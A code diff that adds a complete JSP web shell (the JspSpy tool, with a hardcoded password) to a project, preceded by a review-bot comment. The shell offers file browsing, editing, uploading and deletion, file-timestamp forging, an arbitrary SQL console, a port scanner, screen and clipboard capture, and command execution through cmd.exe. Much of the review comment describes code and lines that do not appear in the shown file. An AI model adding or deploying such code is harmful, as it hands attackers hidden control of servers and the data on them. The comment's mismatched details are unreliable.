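Review bot: Both `catch (Exception ioe)` clauses in `StreamConnector.run()` and the `catch(Exception e)` that closes the scriptlet have no block as shown, and the page directive ends in `% >` with a space, so the file does not translate as rendered (the braces may have been lost in extraction). What the visible code does is open a `Socket` to the request-supplied `ipaddress`/`port` and join its streams to a `cmd.exe` process, again with no access check. The controls that matter sit outside the file: deny outbound connections from the application server except to known dependencies, and alert when the container's JVM spawns a shell. If the file is retained as a sample, a header such as `<%-- SAMPLE: outbound shell relay; connects to ?ipaddress=&port= --%>` should replace the bare `// backdoor.jsp` line, which is emitted as page text.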
@@ -0,0 +1,2326 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** + +*/ +private static final String PW = "k8team"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String 
pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + 
+} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? 
"" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = 
Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { 
+PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
    +try{
    +out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
    +}catch (Exception ex) {
    +out.println("ClipBoard is Empty Or Is Not Text Data !");
    +}
    +out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout ??? : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { 
+output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { 